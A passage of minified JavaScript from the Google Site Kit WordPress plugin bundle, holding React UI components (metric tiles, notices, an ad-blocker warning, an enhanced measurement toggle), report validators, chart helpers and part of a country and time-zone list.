a=(0,i(63696).createContext)(""),{Consumer:s,Provider:o}=a,n=a},20697:(e,t,i)=>{"use strict";i.d(t,{Ax:()=>o,CZ:()=>d,Ej:()=>S,Gw:()=>k,Is:()=>n,KK:()=>u,Nn:()=>v,OT:()=>f,SH:()=>N,Y$:()=>m,ZS:()=>r,bg:()=>h,en:()=>T,ep:()=>I,f7:()=>s,hi:()=>p,jU:()=>a,k$:()=>A,kz:()=>j,ly:()=>l,mo:()=>y,s3:()=>M,uR:()=>c,zx:()=>g});const a="mainDashboard",s="entityDashboard",o="mainDashboardViewOnly",n="entityDashboardViewOnly",r="userInput",l="activation",c="splash",d="adminBar",g="adminBarViewOnly",u="settings",m="adBlockingRecovery",p="wpDashboard",I="wpDashboardViewOnly",h="moduleSetup",y="metricSelection",A="wpBlockEditor",M="keyMetricsSetup",N="key-metrics",f="traffic",T="content",S="speed",k="monetization",j=[a,s,o,n,r,c,u,h,y],v=[o,n,g,I]},21018:(e,t,i)=>{"use strict";i.d(t,{A:()=>MetricTileText});var a=i(62688),s=i.n(a),o=i(74655),n=i(6109),r=i(95806),l=i(62540);function MetricTileText({metricValue:e,metricValueFormat:t,subText:i,previousValue:a,currentValue:s,...c}){const d=(0,n.mK)(t);return(0,l.jsxs)(r.A,{className:"googlesitekit-km-widget-tile--text",...c,children:[(0,l.jsxs)("div",{className:"googlesitekit-km-widget-tile__metric-container",children:[(0,l.jsx)("div",{className:"googlesitekit-km-widget-tile__metric",children:e}),(0,l.jsx)("p",{className:"googlesitekit-km-widget-tile__subtext",children:i})]}),(0,l.jsx)("div",{className:"googlesitekit-km-widget-tile__metric-change-container",children:(0,l.jsx)(o.A,{previousValue:a,currentValue:s,isAbsolute:"percent"===d?.style})})]})}MetricTileText.propTypes={metricValue:s().oneOfType([s().string,s().number]),subtext:s().string,previousValue:s().number,currentValue:s().number}},21492:(e,t,i)=>{"use strict";i.d(t,{A:()=>StepHint});var a=i(62688),s=i.n(a),o=i(82267),n=i(62540);function StepHint({leadingText:e,tooltipText:t}){return(0,n.jsxs)("div",{className:"googlesitekit-setup__step-hint",children:[(0,n.jsx)("p",{children:e}),(0,n.jsx)(o.A,{tooltipClassName:"googlesitekit-setup__step-hint-tooltip",title:t})]})}StepHint.propTypes={leadingText:s().oneOfType([s().string,s().element]).isRequired,tooltipText:s().oneOfType([s().string,s().element]).isRequired}},22942:(e,t,i)=>{"use strict";i.d(t,{A_:()=>d,DF:()=>u,L1:()=>m,M0:()=>n,Mc:()=>r,Ok:()=>c,U9:()=>l,iW:()=>o,ue:()=>s,wq:()=>a,xR:()=>g});const a=1,s=2,o=3,n="enhanced-measurement-activation-banner-tooltip-state",r="enhanced-measurement-activation-banner-dismissed-item",l="_r.explorerCard..selmet",c="_r.explorerCard..seldim",d="_r..dataFilters",g="_r..nav",u="key-metrics-connect-ga4-cta-widget",m="analytics-4"},23955:(e,t,i)=>{"use strict";i.d(t,{A:()=>AdBlockerWarning});var a,s=i(62688),o=i.n(s),n=i(50539),r=i(29785),l=i(88273),c=i(82871),d=i(13606),g=i(38432),u=i(63696);function m(){return m=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},m.apply(null,arguments)}const p=e=>u.createElement("svg",m({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 13 14"},e),a||(a=u.createElement("path",{stroke:"currentColor",strokeWidth:1.5,d:"M4.5 1.5H3a2 2 0 0 0-2 2v7a2 2 0 0 0 2 2h7a2 2 0 0 0 2-2V9M7 1.5h5v5M5 8.5 11.5 2"})));var I=i(25797),h=i(62540);function AdBlockerWarningMessage({getHelpLink:e="",warningMessage:t=null}){return t?(0,h.jsx)(I.A,{className:"googlesitekit-notice--small",type:I.A.TYPES.WARNING,description:(0,d.A)((0,c.sprintf)(/* translators: 1: The warning message. 2: "Get help" text. */ /* translators: 1: The warning message. 2: "Get help" text. */ (0,c.__)("%1$s. <Link><Strong>%2$s</Strong></Link>","google-site-kit"),t,(0,c.__)("Get help","google-site-kit")),{Link:(0,h.jsx)(g.A,{href:e,trailingIcon:(0,h.jsx)(p,{width:15,height:15}),external:!0,hideExternalIndicator:!0}),Strong:(0,h.jsx)("strong",{})}),hideIcon:!0}):null}function AdBlockerWarning({moduleSlug:e,className:t}){const i=(0,n.useSelect)(t=>t(l.i).getModuleStoreName(e)),a=(0,n.useSelect)(e=>e(i)?.getAdBlockerWarningMessage()),s=(0,n.useSelect)(t=>t(r.O4).getDocumentationLinkURL(`${e}-ad-blocker-detected`));return(0,h.jsx)(AdBlockerWarningMessage,{className:t,getHelpLink:s,warningMessage:a})}AdBlockerWarningMessage.propTypes={getHelpLink:o().string,warningMessage:o().string},AdBlockerWarning.propTypes={className:o().string,moduleSlug:o().string.isRequired}},24355:(e,t,i)=>{"use strict";i.d(t,{SO:()=>r});var a=i(55620),s=i(99123);function o(){return[i.g.innerWidth,i.g.innerHeight]}function n({fps:e=60,leading:t=!1,initialWidth:i=0,initialHeight:n=0}={}){const[r,l]=(0,a._)("undefined"==typeof document?[i,n]:o,e,t);function c(){return l(o)}return(0,s.A)(window,"resize",c),(0,s.A)(window,"orientationchange",c),r}function r(e={}){return n(e)[0]}},24560:(e,t,i)=>{"use strict";i.d(t,{A:()=>__WEBPACK_DEFAULT_EXPORT__});var a,s=i(63696);function o(){return o=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},o.apply(null,arguments)}const __WEBPACK_DEFAULT_EXPORT__=e=>s.createElement("svg",o({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16 12"},e),a||(a=s.createElement("g",{fill:"currentColor",fillRule:"evenodd"},s.createElement("path",{d:"M0 6.414 1.415 5l5.292 5.292-1.414 1.415z"}),s.createElement("path",{d:"m14.146.146 1.415 1.414L5.414 11.707 4 10.292z"}))))},25064:(e,t,i)=>{"use strict";i.d(t,{A:()=>MetricTileHeader});var a=i(62688),s=i.n(a),o=i(82267),n=i(55989),r=i(33052),l=i(62540);function MetricTileHeader({title:e,infoTooltip:t,loading:i}){return(0,l.jsxs)("div",{className:"googlesitekit-km-widget-tile__title-container",children:[(0,l.jsx)(r.A,{as:"h3",size:"small",type:"label",className:"googlesitekit-km-widget-tile__title",children:e}),i?(0,l.jsx)(n.A,{children:(0,l.jsx)(o.A,{title:t})}):(0,l.jsx)(o.A,{title:t})]})}MetricTileHeader.propTypes={title:s().string,infoTooltip:s().oneOfType([s().string,s().element]),loading:s().bool}},25427:(e,t,i)=>{"use strict";i.d(t,{G4:()=>c,Ig:()=>o,Q3:()=>l,a2:()=>n,wA:()=>r});var a=i(17243),s=i(73730);function o(e){function t(e){return"string"==typeof e&&/^[a-zA-Z0-9_]+$/.test(e)}if("string"==typeof e){return e.split(",").every(t)}return(0,s.cX)(e,e=>{const i=e.hasOwnProperty("name")&&t(e.name);if(!e.hasOwnProperty("expression"))return i;const a="string"==typeof e.expression;return i&&a},t)}function n(e){return(0,s.cX)(e,e=>e.hasOwnProperty("name")&&"string"==typeof e.name)}function r(e){const t=["string"];return Object.keys(e).every(i=>{if(t.includes(typeof e[i]))return!0;if(Array.isArray(e[i]))return e[i].every(e=>t.includes(typeof e));if((0,a.isPlainObject)(e[i])){const t=Object.keys(e[i]);return!!t.includes("filterType")&&!("emptyFilter"!==e[i].filterType&&!t.includes("value"))}return!1})}function l(e){const t=["string"],i=["numericFilter","betweenFilter"];return Object.values(e).every(e=>{if(t.includes(typeof e))return!0;if(Array.isArray(e))return e.every(e=>t.includes(typeof e));if(!(0,a.isPlainObject)(e))return!1;const{filterType:s,value:o,fromValue:n,toValue:r}=e;if(s&&!i.includes(s))return!1;const l=Object.keys(e);return s&&"numericFilter"!==s?"betweenFilter"===s&&(l.includes("fromValue")&&l.includes("toValue")&&[n,r].every(e=>!(0,a.isPlainObject)(e)||"int64Value"in e)):l.includes("operation")&&l.includes("value")&&(!(0,a.isPlainObject)(o)||"int64Value"in o)})}function c(e){return!!Array.isArray(e)&&e.every(e=>!!(0,a.isPlainObject)(e)&&((!e.hasOwnProperty("desc")||"boolean"==typeof e.desc)&&(e.metric?!e.dimension&&"string"==typeof e.metric?.metricName:!!e.dimension&&"string"==typeof e.dimension?.dimensionName)))}},25797:(e,t,i)=>{"use strict";i.d(t,{A:()=>M});var a,s=i(62688),o=i.n(s),n=i(4452),r=i.n(n),l=i(63696),c=i(19793);function d(){return d=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var i=arguments[t];for(var a in i)({}).hasOwnProperty.call(i,a)&&(e[a]=i[a])}return e},d.apply(null,arguments)}const warning_notice=e=>l.createElement("svg",d({xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},e),a||(a=l.createElement("path",{fill:"currentColor",d:"M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1m0 14a1.5 1.5 0 1 0 0 3 1.5 1.5 0 0 0 0-3m-1-2h2V6h-2z"})));var g=i(42343),u=i(76984),m=i(62540);const p={[u.Q.NEW]:g.A,[u.Q.SUCCESS]:c.A,[u.Q.INFO]:warning_notice,[u.Q.WARNING]:warning_notice,[u.Q.ERROR]:warning_notice};function Icon({type:e}){const t=p[e]||warning_notice;return(0,m.jsx)(t,{width:24,height:24})}function Title({className:e,children:t}){return(0,m.jsx)("p",{className:r()("googlesitekit-notice__title",e),children:t})}function Description({className:e,children:t}){return(0,m.jsx)("p",{className:r()("googlesitekit-notice__description",e),children:t})}Icon.propTypes={type:o().oneOf(Object.values(u.Q))},Title.propTypes={className:o().string,children:o().node},Description.propTypes={className:o().string,children:o().node};var I=i(49383),h=i(83366);function CTAButton({label:e,disabled:t,inProgress:i,onClick:a,href:s,external:o=!1,hideExternalIndicator:n=!1}){let l;return o&&!n&&(l=(0,m.jsx)(h.A,{width:14,height:14})),(0,m.jsx)(I.SpinnerButton,{className:r()("googlesitekit-notice__cta",{"googlesitekit-notice__cta--spinner__running":i}),disabled:t,isSaving:i,onClick:a,href:s,target:o?"_blank":void 0,trailingIcon:l,children:e})}CTAButton.propTypes={label:o().string.isRequired,disabled:o().bool,inProgress:o().bool,onClick:o().func,href:o().string,external:o().bool,hideExternalIndicator:o().bool};var y=i(82871);function DismissButton({label:e=(0,y.__)("Got it","google-site-kit"),onClick:t,disabled:i}){return(0,m.jsx)(I.Button,{onClick:t,disabled:i,tertiary:!0,children:e})}DismissButton.propTypes={label:o().string,onClick:o().func.isRequired,disabled:o().bool};const A=(0,l.forwardRef)(({className:e,title:t,description:i,dismissButton:a,ctaButton:s,type:o=u.Q.INFO,children:n,hideIcon:l},c)=>(0,m.jsxs)("div",{ref:c,className:r()("googlesitekit-notice",`googlesitekit-notice--${o}`,e),children:[!l&&(0,m.jsx)("div",{className:"googlesitekit-notice__icon",children:(0,m.jsx)(Icon,{type:o})}),(0,m.jsxs)("div",{className:"googlesitekit-notice__content",children:[t&&(0,m.jsx)(Title,{children:t}),i&&(0,m.jsx)(Description,{children:i})]}),(a?.label||a?.onClick||s?.label&&(s?.onClick||s?.href)||n)&&(0,m.jsxs)("div",{className:"googlesitekit-notice__action",children:[n,(a?.label||a?.onClick)&&(0,m.jsx)(DismissButton,{label:a.label,onClick:a.onClick,disabled:a.disabled}),s?.label&&(s?.onClick||s?.href)&&(0,m.jsx)(CTAButton,{label:s.label,onClick:s.onClick,inProgress:s.inProgress,disabled:s.disabled,href:s.href,external:s.external,hideExternalIndicator:s.hideExternalIndicator})]})]}));A.TYPES=u.Q,A.propTypes={className:o().string,title:o().oneOfType([o().string,o().object]),description:o().node,type:o().oneOf(Object.values(u.Q)),dismissButton:o().shape(DismissButton.propTypes),ctaButton:o().shape({...CTAButton.propTypes,label:o().string}),children:o().node,hideIcon:o().bool};const M=A},25850:(e,t,i)=>{"use strict";i.d(t,{A:()=>EnhancedMeasurementSwitch});var a=i(4452),s=i.n(a),o=i(62688),n=i.n(o),r=i(15844),l=i(63696),c=i(13606),d=i(82871),g=i(50539),u=i(49383),m=i(11999),p=i(80),I=i(55103),h=i(6109),y=i(62659),A=i(63972),M=i(68832),N=i(62540);function EnhancedMeasurementSwitch({className:e,onClick:t,disabled:i=!1,loading:a=!1,formName:o=p.TQ,isEnhancedMeasurementAlreadyEnabled:n=!1,showTick:f=!1}){const T=(0,M.A)(o,p.aj),S=(0,y.A)(),{setValues:k}=(0,g.useDispatch)(m.s),j=(0,l.useCallback)(()=>{k(o,{[p.aj]:!T}),(0,h.sx)(`${S}_analytics`,T?"deactivate_enhanced_measurement":"activate_enhanced_measurement"),t?.()},[o,T,t,k,S]);return(0,r.A)(()=>{k(p.TQ,{[p.Lf]:!0})}),(0,N.jsxs)("div",{className:s()("googlesitekit-analytics-enable-enhanced-measurement",e,{"googlesitekit-analytics-enable-enhanced-measurement--loading":a}),children:[a&&(0,N.jsx)(u.ProgressBar,{className:"googlesitekit-analytics-enable-enhanced-measurement__progress--settings-edit",small:!0}),!a&&n&&(0,N.jsxs)("div",{className:"googlesitekit-analytics-enable-enhanced-measurement__already-enabled-label",children:[f&&(0,N.jsx)("div",{className:"googlesitekit-analytics-enable-enhanced-measurement__already-enabled-tick",children:(0,N.jsx)(A.A,{})}),(0,d.__)("Enhanced measurement is enabled for this web data stream","google-site-kit")]}),!a&&!n&&(0,N.jsx)(u.Switch,{label:(0,d.__)("Enable enhanced measurement","google-site-kit"),checked:T,disabled:i,onClick:j,hideLabel:!1}),(0,N.jsx)("p",{className:"googlesitekit-module-settings-group__helper-text",children:(0,c.A)((0,d.__)("This allows you to measure interactions with your content (e.g. file downloads, form completions, video views). <a>Learn more</a>","google-site-kit"),{a:(0,N.jsx)(I.A,{path:"/analytics/answer/9216061",external:!0})})})]})}EnhancedMeasurementSwitch.propTypes={onClick:n().func,disabled:n().bool,loading:n().bool,isEnhancedMeasurementAlreadyEnabled:n().bool,showTick:n().bool}},28975:(e,t,i)=>{"use strict";i.d(t,{$J:()=>l,Hp:()=>c,Od:()=>d,_8:()=>r,gZ:()=>n});var a=i(17243),s=i(97513),o=i(6109);function n(e,t){if(!t?.length)return e;let i=[];return e?.length&&(i=e[0].reduce((e,t,i)=>t?.role?[...e,i]:e,[])),e.map(e=>e.filter((e,a)=>0===a||t.includes(a-1)||i.includes(a-1)))}function r(e,t,i,a){const s={height:e||t,width:i||a};return s.width&&!s.height&&(s.height="100%"),s.height&&!s.width&&(s.width="100%"),s}function l(e,t,i){const a=[...e||[]];return t&&a.push({eventName:"ready",callback:t}),i&&a.push({eventName:"select",callback:i}),a}function c(e,{gatheringData:t,chartType:i,startDate:n,endDate:r,breakpoint:l}){const c=(0,a.cloneDeep)(e);if(t&&"LineChart"===i&&(e?.vAxis?.viewWindow?.min||(0,a.set)(c,"vAxis.viewWindow.min",0),e?.vAxis?.viewWindow?.max||(0,a.set)(c,"vAxis.viewWindow.max",100),e?.hAxis?.viewWindow?.min||((0,a.set)(c,"hAxis.viewWindow.min",(0,o.XH)(n)),delete c.hAxis.ticks),e?.hAxis?.viewWindow?.max||((0,a.set)(c,"hAxis.viewWindow.max",(0,o.XH)(r)),delete c.hAxis.ticks)),"LineChart"===i){if(e?.hAxis?.maxTextLines||(0,a.set)(c,"hAxis.maxTextLines",1),!e?.hAxis?.minTextSpacing){const e=l===s.mp?50:100;(0,a.set)(c,"hAxis.minTextSpacing",e)}void 0===e?.tooltip?.isHtml&&((0,a.set)(c,"tooltip.isHtml",!0),(0,a.set)(c,"tooltip.trigger","both"))}return(0,a.merge)(c,{hAxis:{textStyle:{fontSize:10,color:"#5f6561"}},vAxis:{textStyle:{color:"#5f6561",fontSize:10}},legend:{textStyle:{color:"#131418",fontSize:12}}}),c}function d(e,t=(0,o.JK)()){const i=Intl.NumberFormat(t,{style:"currency",currency:e}).formatToParts(1e6);return i.reduce((e,t)=>{const{value:s}=t;switch(t.type){case"group":return e+",";case"decimal":return e+".";case"currency":return e+s;case"literal":return e+(/^\s*$/.test(s)?s:"");case"integer":const o=s.replace(/\d/g,"#");return e+((0,a.findLast)(i,({type:e})=>"integer"===e)===t?o.replace(/#$/,"0"):o);case"fraction":return e+s.replace(/\d/g,"0");default:return e}},"")}},29785:(e,t,i)=>{"use strict";i.d(t,{O4:()=>a,OQ:()=>o,qc:()=>s});const a="core/site",s="primary",o="secondary"},30511:(e,t,i)=>{"use strict";i.d(t,{mn:()=>s,fX:()=>n,hd:()=>r,VI:()=>o});var a=i(17243);const s=[{countryCode:"AF",displayName:"Afghanistan",defaultTimeZoneId:"Asia/Kabul",timeZone:[{timeZoneId:"Asia/Kabul",displayName:"(GMT+04:30) Afghanistan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"AL",displayName:"Albania",defaultTimeZoneId:"Europe/Tirane",timeZone:[{timeZoneId:"Europe/Tirane",displayName:"(GMT+02:00) Albania Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"DZ",displayName:"Algeria",defaultTimeZoneId:"Africa/Algiers",timeZone:[{timeZoneId:"Africa/Algiers",displayName:"(GMT+01:00) Algeria Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"AS",displayName:"American Samoa",defaultTimeZoneId:"Pacific/Pago_Pago",timeZone:[{timeZoneId:"Pacific/Pago_Pago",displayName:"(GMT-11:00) American Samoa Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"AD",displayName:"Andorra",defaultTimeZoneId:"Europe/Andorra",timeZone:[{timeZoneId:"Europe/Andorra",displayName:"(GMT+02:00) Andorra Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"AQ",displayName:"Antarctica",defaultTimeZoneId:"Antarctica/Palmer",timeZone:[{timeZoneId:"Antarctica/Palmer",displayName:"(GMT-03:00) Palmer Time"},{timeZoneId:"Antarctica/Rothera",displayName:"(GMT-03:00) Rothera Time"},{timeZoneId:"Antarctica/Syowa",displayName:"(GMT+03:00) Syowa Time"},{timeZoneId:"Antarctica/Mawson",displayName:"(GMT+05:00) Mawson Time"},{timeZoneId:"Antarctica/Vostok",displayName:"(GMT+06:00) Vostok Time"},{timeZoneId:"Antarctica/Davis",displayName:"(GMT+07:00) Davis Time"},{timeZoneId:"Antarctica/Casey",displayName:"(GMT+08:00) Casey Time"},{timeZoneId:"Antarctica/DumontDUrville",displayName:"(GMT+10:00) Dumont d’Urville Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"AR",displayName:"Argentina",defaultTimeZoneId:"America/Buenos_Aires",timeZone:[{timeZoneId:"America/Buenos_Aires",displayName:"(GMT-03:00) Buenos Aires Time"},{timeZoneId:"America/Cordoba",displayName:"(GMT-03:00) Cordoba Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"AM",displayName:"Armenia",defaultTimeZoneId:"Asia/Yerevan",timeZone:[{timeZoneId:"Asia/Yerevan",displayName:"(GMT+04:00) Armenia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"AU",displayName:"Australia",defaultTimeZoneId:"Australia/Perth",timeZone:[{timeZoneId:"Australia/Perth",displayName:"(GMT+08:00) Perth Time"},{timeZoneId:"Australia/Adelaide",displayName:"(GMT+09:30) Adelaide Time"},{timeZoneId:"Australia/Darwin",displayName:"(GMT+09:30) Darwin Time"},{timeZoneId:"Australia/Brisbane",displayName:"(GMT+10:00) Brisbane Time"},{timeZoneId:"Australia/Hobart",displayName:"(GMT+10:00) Hobart Time"},{timeZoneId:"Australia/Melbourne",displayName:"(GMT+10:00) Melbourne Time"},{timeZoneId:"Australia/Sydney",displayName:"(GMT+10:00) Sydney Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"AT",displayName:"Austria",defaultTimeZoneId:"Europe/Vienna",timeZone:[{timeZoneId:"Europe/Vienna",displayName:"(GMT+02:00) Austria Time"}],tosLocale:{language:"de",country:"DE"}},{countryCode:"AZ",displayName:"Azerbaijan",defaultTimeZoneId:"Asia/Baku",timeZone:[{timeZoneId:"Asia/Baku",displayName:"(GMT+04:00) Azerbaijan Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"BS",displayName:"Bahamas",defaultTimeZoneId:"America/Nassau",timeZone:[{timeZoneId:"America/Nassau",displayName:"(GMT-04:00) Bahamas Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BD",displayName:"Bangladesh",defaultTimeZoneId:"Asia/Dhaka",timeZone:[{timeZoneId:"Asia/Dhaka",displayName:"(GMT+06:00) Bangladesh Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BB",displayName:"Barbados",defaultTimeZoneId:"America/Barbados",timeZone:[{timeZoneId:"America/Barbados",displayName:"(GMT-04:00) Barbados Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BY",displayName:"Belarus",defaultTimeZoneId:"Europe/Minsk",timeZone:[{timeZoneId:"Europe/Minsk",displayName:"(GMT+03:00) Belarus Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"BE",displayName:"Belgium",defaultTimeZoneId:"Europe/Brussels",timeZone:[{timeZoneId:"Europe/Brussels",displayName:"(GMT+02:00) Belgium Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"BZ",displayName:"Belize",defaultTimeZoneId:"America/Belize",timeZone:[{timeZoneId:"America/Belize",displayName:"(GMT-06:00) Belize Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"BM",displayName:"Bermuda",defaultTimeZoneId:"Atlantic/Bermuda",timeZone:[{timeZoneId:"Atlantic/Bermuda",displayName:"(GMT-03:00) Bermuda Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BT",displayName:"Bhutan",defaultTimeZoneId:"Asia/Thimphu",timeZone:[{timeZoneId:"Asia/Thimphu",displayName:"(GMT+06:00) Bhutan Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BO",displayName:"Bolivia",defaultTimeZoneId:"America/La_Paz",timeZone:[{timeZoneId:"America/La_Paz",displayName:"(GMT-04:00) Bolivia Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"BA",displayName:"Bosnia & Herzegovina",defaultTimeZoneId:"Europe/Sarajevo",timeZone:[{timeZoneId:"Europe/Sarajevo",displayName:"(GMT+02:00) Bosnia & Herzegovina Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"BR",displayName:"Brazil",defaultTimeZoneId:"America/Rio_Branco",timeZone:[{timeZoneId:"America/Rio_Branco",displayName:"(GMT-05:00) Rio Branco Time"},{timeZoneId:"America/Boa_Vista",displayName:"(GMT-04:00) Boa Vista Time"},{timeZoneId:"America/Campo_Grande",displayName:"(GMT-04:00) Campo Grande Time"},{timeZoneId:"America/Cuiaba",displayName:"(GMT-04:00) Cuiaba Time"},{timeZoneId:"America/Manaus",displayName:"(GMT-04:00) Manaus Time"},{timeZoneId:"America/Porto_Velho",displayName:"(GMT-04:00) Porto Velho Time"},{timeZoneId:"America/Araguaina",displayName:"(GMT-03:00) Araguaina Time"},{timeZoneId:"America/Bahia",displayName:"(GMT-03:00) Bahia Time"},{timeZoneId:"America/Belem",displayName:"(GMT-03:00) Belem Time"},{timeZoneId:"America/Fortaleza",displayName:"(GMT-03:00) Fortaleza Time"},{timeZoneId:"America/Maceio",displayName:"(GMT-03:00) Maceio Time"},{timeZoneId:"America/Recife",displayName:"(GMT-03:00) Recife Time"},{timeZoneId:"America/Sao_Paulo",displayName:"(GMT-03:00) Sao Paulo Time"},{timeZoneId:"America/Noronha",displayName:"(GMT-02:00) Noronha Time"}],tosLocale:{language:"pt",country:"BR"}},{countryCode:"IO",displayName:"British Indian Ocean Territory",defaultTimeZoneId:"Indian/Chagos",timeZone:[{timeZoneId:"Indian/Chagos",displayName:"(GMT+06:00) British Indian Ocean Territory Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"BN",displayName:"Brunei",defaultTimeZoneId:"Asia/Brunei",timeZone:[{timeZoneId:"Asia/Brunei",displayName:"(GMT+08:00) Brunei Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"BG",displayName:"Bulgaria",defaultTimeZoneId:"Europe/Sofia",timeZone:[{timeZoneId:"Europe/Sofia",displayName:"(GMT+03:00) Bulgaria Time"}],tosLocale:{language:"bg",country:"BG"}},{countryCode:"CA",displayName:"Canada",defaultTimeZoneId:"America/Dawson",timeZone:[{timeZoneId:"America/Dawson",displayName:"(GMT-07:00) Dawson Time"},{timeZoneId:"America/Vancouver",displayName:"(GMT-07:00) Vancouver Time"},{timeZoneId:"America/Whitehorse",displayName:"(GMT-07:00) Whitehorse Time"},{timeZoneId:"America/Edmonton",displayName:"(GMT-06:00) Edmonton Time"},{timeZoneId:"America/Yellowknife",displayName:"(GMT-06:00) Yellowknife Time"},{timeZoneId:"America/Dawson_Creek",displayName:"(GMT-07:00) Dawson Creek Time"},{timeZoneId:"America/Winnipeg",displayName:"(GMT-05:00) Winnipeg Time"},{timeZoneId:"America/Regina",displayName:"(GMT-06:00) Regina Time"},{timeZoneId:"America/Iqaluit",displayName:"(GMT-04:00) Iqaluit Time"},{timeZoneId:"America/Toronto",displayName:"(GMT-04:00) Toronto Time"},{timeZoneId:"America/Halifax",displayName:"(GMT-03:00) Halifax Time"},{timeZoneId:"America/St_Johns",displayName:"(GMT-02:30) St. John’s Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"CV",displayName:"Cape Verde",defaultTimeZoneId:"Atlantic/Cape_Verde",timeZone:[{timeZoneId:"Atlantic/Cape_Verde",displayName:"(GMT-01:00) Cape Verde Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"TD",displayName:"Chad",defaultTimeZoneId:"Africa/Ndjamena",timeZone:[{timeZoneId:"Africa/Ndjamena",displayName:"(GMT+01:00) Chad Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"CL",displayName:"Chile",defaultTimeZoneId:"Pacific/Easter",timeZone:[{timeZoneId:"Pacific/Easter",displayName:"(GMT-06:00) Easter Time"},{timeZoneId:"America/Santiago",displayName:"(GMT-04:00) Chile Time"},{timeZoneId:"America/Punta_Arenas",displayName:"(GMT-03:00) Punta Arenas Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"CN",displayName:"China",defaultTimeZoneId:"Asia/Shanghai",timeZone:[{timeZoneId:"Asia/Shanghai",displayName:"(GMT+08:00) China Time"}],tosLocale:{language:"zh",country:"CN"}},{countryCode:"CX",displayName:"Christmas Island",defaultTimeZoneId:"Indian/Christmas",timeZone:[{timeZoneId:"Indian/Christmas",displayName:"(GMT+07:00) Christmas Island Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"CC",displayName:"Cocos (Keeling) Islands",defaultTimeZoneId:"Indian/Cocos",timeZone:[{timeZoneId:"Indian/Cocos",displayName:"(GMT+06:30) Cocos (Keeling) Islands Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"CO",displayName:"Colombia",defaultTimeZoneId:"America/Bogota",timeZone:[{timeZoneId:"America/Bogota",displayName:"(GMT-05:00) Colombia Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"CK",displayName:"Cook Islands",defaultTimeZoneId:"Pacific/Rarotonga",timeZone:[{timeZoneId:"Pacific/Rarotonga",displayName:"(GMT-10:00) Cook Islands Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"CR",displayName:"Costa Rica",defaultTimeZoneId:"America/Costa_Rica",timeZone:[{timeZoneId:"America/Costa_Rica",displayName:"(GMT-06:00) Costa Rica Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"CI",displayName:"Côte d’Ivoire",defaultTimeZoneId:"Africa/Abidjan",timeZone:[{timeZoneId:"Africa/Abidjan",displayName:"(GMT+00:00) Côte d’Ivoire Time"}],tosLocale:{language:"fr",country:"FR"}},{countryCode:"HR",displayName:"Croatia",defaultTimeZoneId:"Europe/Zagreb",timeZone:[{timeZoneId:"Europe/Zagreb",displayName:"(GMT+02:00) Croatia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"CU",displayName:"Cuba",defaultTimeZoneId:"America/Havana",timeZone:[{timeZoneId:"America/Havana",displayName:"(GMT-04:00) Cuba Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"CW",displayName:"Curaçao",defaultTimeZoneId:"America/Curacao",timeZone:[{timeZoneId:"America/Curacao",displayName:"(GMT-04:00) Curaçao Time"}],tosLocale:{language:"en",country:"US"}},{countryCode:"CY",displayName:"Cyprus",defaultTimeZoneId:"Asia/Nicosia",timeZone:[{timeZoneId:"Asia/Nicosia",displayName:"(GMT+03:00) Nicosia Time"}],tosLocale:{language:"en",country:"GB"}},{countryCode:"CZ",displayName:"Czechia",defaultTimeZoneId:"Europe/Prague",timeZone:[{timeZoneId:"Europe/Prague",displayName:"(GMT+02:00) Czechia Time"}],tosLocale:{language:"cs",country:"CZ"}},{countryCode:"DK",displayName:"Denmark",defaultTimeZoneId:"Europe/Copenhagen",timeZone:[{timeZoneId:"Europe/Copenhagen",displayName:"(GMT+02:00) Denmark Time"}],tosLocale:{language:"da",country:"DK"}},{countryCode:"DO",displayName:"Dominican Republic",defaultTimeZoneId:"America/Santo_Domingo",timeZone:[{timeZoneId:"America/Santo_Domingo",displayName:"(GMT-04:00) Dominican Republic Time"}],tosLocale:{language:"es",country:"ES"}},{countryCode:"EC",displayName:"Ecuador",defaultTimeZoneId:"Pacific/Galapagos",timeZone:[{timeZoneId:"Pacific/Galapagos",displayName:"(GMT-06:00) Galapagos Time"},{timeZoneId:"America/Guayaquil",displayName:"(GMT-05:00) Ecuador 